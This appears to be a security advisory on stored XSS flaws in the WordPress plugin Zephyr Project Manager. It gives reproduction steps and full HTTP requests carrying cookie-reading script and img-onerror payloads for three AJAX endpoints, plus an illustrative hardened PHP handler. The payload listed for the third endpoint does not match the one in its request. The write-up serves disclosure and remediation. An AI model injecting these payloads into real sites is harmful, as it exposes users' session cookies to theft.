Wordpress Plugin Zephyr Project Manager < 3.2.5 — Unauthorised AJAX Calls To Stored XSS

Rizacan Tufan
Oct 3, 2023 (2 min read)

Description

Zephyr Project Manager is a plug-in that helps you manage all your projects and tasks and get things done effectively.

It was determined that, in most places throughout the application, data from input fields is stored and rendered as HTML without any sanitization or validation.

The details of the discovery are given below.

Proof of Concept (PoC)

The details of the various XSS issues (Reflected and Stored) in the application are given below.

Endpoint Of New Discussion For Task (Stored XSS)

Steps To Reproduce :

  1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks&action=view_task&task_id=1
  2. Click on Discussion tab.
  3. Enter the payload in the comment field.
  4. Click on “Comment”.

Sample Request :

POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks&action=view_task&task_id=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 108
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

user_id=1&subject=task&subject_id=213&message=%3cscript%3ealert(document.cookie)%3c%2fscript%3e&type=message&action=zpm_send_comment&zpm_nonce=22858bf3a7

Payload : %3cscript%3ealert(document.cookie)%3c%2fscript%3e

Parameter(s) : message
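To show what the missing controls look like on the server side, here is an illustrative hardened admin-ajax handler for an action like zpm_send_comment, added here as an example and not the plugin's own code. The action name, the message, subject_id and user_id parameters and the zpm_nonce field are taken from the request above; the nonce action string, the zpm_store_comment() helper and the zpm_comment capability are assumed names for this example.

```php
<?php
// Illustrative hardening for an admin-ajax handler such as zpm_send_comment.
// Not the plugin's own code: zpm_store_comment() and the 'zpm_comment'
// capability are assumed names used only in this example.

// Unsafe pattern described in the write-up (shown for contrast): the raw POST
// value is stored and later emitted as HTML, so <script>...</script> executes
// in every browser that views the discussion.
function zpm_send_comment_unsafe() {
    $message = $_POST['message'];
    zpm_store_comment( (int) $_POST['user_id'], (int) $_POST['subject_id'], $message );
    echo '<div class="zpm-comment">' . $message . '</div>';
    wp_die();
}

function zpm_send_comment_hardened() {
    // 1. Reject requests whose nonce was not minted for this action.
    check_ajax_referer( 'zpm_send_comment', 'zpm_nonce' );

    // 2. Authorise: a logged-in session alone is not enough; require a capability.
    if ( ! current_user_can( 'zpm_comment' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Never trust a user_id field from the request; take it from the session.
    $user_id = get_current_user_id();

    // 4. Validate types and strip markup before anything is stored.
    $subject_id = absint( $_POST['subject_id'] ?? 0 );
    $message    = sanitize_text_field( wp_unslash( $_POST['message'] ?? '' ) );
    // If rich text must be allowed, use wp_kses_post() instead: it keeps a
    // whitelist of safe tags and drops <script> and on* event handlers.

    if ( 0 === $subject_id || '' === $message ) {
        wp_send_json_error( 'invalid input', 400 );
    }

    zpm_store_comment( $user_id, $subject_id, $message );

    // 5. Escape on output as well; input sanitisation is not a substitute.
    wp_send_json_success( array(
        'html' => '<div class="zpm-comment">' . esc_html( $message ) . '</div>',
    ) );
}
add_action( 'wp_ajax_zpm_send_comment', 'zpm_send_comment_hardened' );
```

The same three controls (nonce check, capability check, sanitise-then-escape) apply to the zpm_add_team and zpm_update_user_access handlers described below.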

Endpoint Of New Team and Team Update (Stored XSS)

Steps To Reproduce :

  1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
  2. Click on “New Team” or “Edit Team”.
  3. Enter the payload in the team name and team description fields.
  4. Click on “Create Team”.

Sample Request :

POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&description=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&action=zpm_add_team

Payload : %3cscript%3ealert(document.cookie)%3c%2fscript%3e

Parameter(s) : name,description

Endpoint Of User Access (Stored XSS)

Steps To Reproduce :

  1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
  2. Click on “Bulk Edit Access”.
  3. Choose any options.
  4. Click on “Allow Access”.
  5. Intercept the request with a proxy and modify the “access” parameter.
  6. Click on “Create Team”.

Sample Request :

POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1103
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

user_id%5B0%5D%5Bid%5D=1&user_id%5B0%5D%5Bemail%5D=dev-email%40flywheel.local&user_id%5B0%5D%5Bname%5D=admin&user_id%5B0%5D%5Bdescription%5D=&user_id%5B0%5D%5Bavatar%5D=https%3A%2F%2Fsecure.gravatar.com%2Favatar%2Fc2b06ae950033b392998ada50767b50e%3Fs%3D96%26d%3Dmm%26r%3Dg&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_activity%5D=0&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_tasks%5D=1&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_updates%5D=0&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_task_assigned%5D=1&user_id%5B0%5D%5Bcan_zephyr%5D=true&user_id%5B1%5D%5Bid%5D=1&user_id%5B1%5D%5Bemail%5D=dev-email%40flywheel.local&user_id%5B1%5D%5Bname%5D=admin&user_id%5B1%5D%5Bdescription%5D=&user_id%5B1%5D%5Bavatar%5D=https%3A%2F%2Fsecure.gravatar.com%2Favatar%2Fc2b06ae950033b392998ada50767b50e%3Fs%3D96%26d%3Dmm%26r%3Dg&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_activity%5D=0&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_tasks%5D=1&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_updates%5D=0&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_task_assigned%5D=1&user_id%5B1%5D%5Bcan_zephyr%5D=true&access=trueo6c2i%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3eb6lt4&action=zpm_update_user_access

Payload : %3cscript%3ealert(document.cookie)%3c%2fscript%3e

Parameter(s) : access

References
